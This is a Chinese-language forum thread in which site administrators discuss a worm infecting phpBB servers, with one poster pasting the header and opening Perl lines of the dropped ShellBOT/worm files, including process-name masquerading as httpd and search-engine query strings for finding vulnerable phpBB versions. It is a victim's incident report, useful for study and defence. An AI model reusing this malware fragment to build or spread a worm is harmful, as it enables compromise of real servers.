[問題] 近日各位的Server是否有遭受worm攻擊

[sean70]

phpBB 的官方網站已經暫時關閉了 , http://www.phpbb.com
昨日弟的網站也遭受攻擊, 在 tmp 下被放入 31337 , 31338 還有 .hitler 等檔案

31338 內容標頭為
#!/usr/bin/perl
#
# ShellBOT
# 0ldW0lf - old-wolf@zipmail.com
# - http://www.atrix-br.cjb.net
# - http://www.atrix.cjb.net

31337 內容前幾行為\r
# ASW Worm Modification ! by br0k3d@gmail.com ! #
# 4nd Version ! f**k google !


use strict;
use IO::Socket;
use IO::Handle;
\r
#Ripado do b0t.pl

my $processo = '/usr/sbin/httpd';
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);

#Fim da ripagem

sub fetch();
sub remote($);
sub http_query($);
sub encode($);

sub fetch(){
my $rnd=(int(rand(9999)));
my $n= 50;
if ($rnd<5000) { $n<<=1;}
my $s= (int(rand(10)) * $n);

my @str=("powered+-modules++topic+%22by+phpBB+2.0.4%22+",
"view+edit+posts+-modules+-ultimatebb.php+-showthread.php+",
"powered+-modules++topic+%22by+phpBB+2.0.6%22+",
"powered+-modules++topic+%22by+phpBB+2.0.8%22",
"post+-modules+topic+forum%7CphpBB+",
"view+topic+-modules+%22+",
"viewtopic%7CphpBB+-modules+.php+",
"viewtopic+.php+-modules+",
);

因此初步懷疑跟 phpBB 有關..
我已經更新為最新的 2.0.11 了...

有沒有人也有類似經驗呀...

[小竹子]

phpBB 是因為 OS 沒更新跟 PHPBB 本身沒關係，更新升級到 phpBB 2.0.11 也公告一段時間了！
http://phpbb-tw.net/phpbb/viewtopic.php?t=30698

[taicomjp]

OS沒更新\r
這個有關係嗎
不是phpbb裡面源碼漏洞的關係?

[依夢兒]

不是....那是 AWStats 的問題。

[小竹子]

OS沒更新\r
這個有關係嗎
不是phpbb裡面源碼漏洞的關係?

你既然願意到官方看被攻擊的公告，那何不了解一下公告內容有提到，目前 2011 還沒有最新的安全漏洞問題字句？

竹貓也公告了不是 phpBB 問題，是的話官方會有解釋，我們也會同步釋出更新版。

[qboywang]

我跟你一樣多了那些檔~電腦會持續對google或其它站作80 port連線,且有個tcp port會一直增加對外部的不知明主機6667port連線!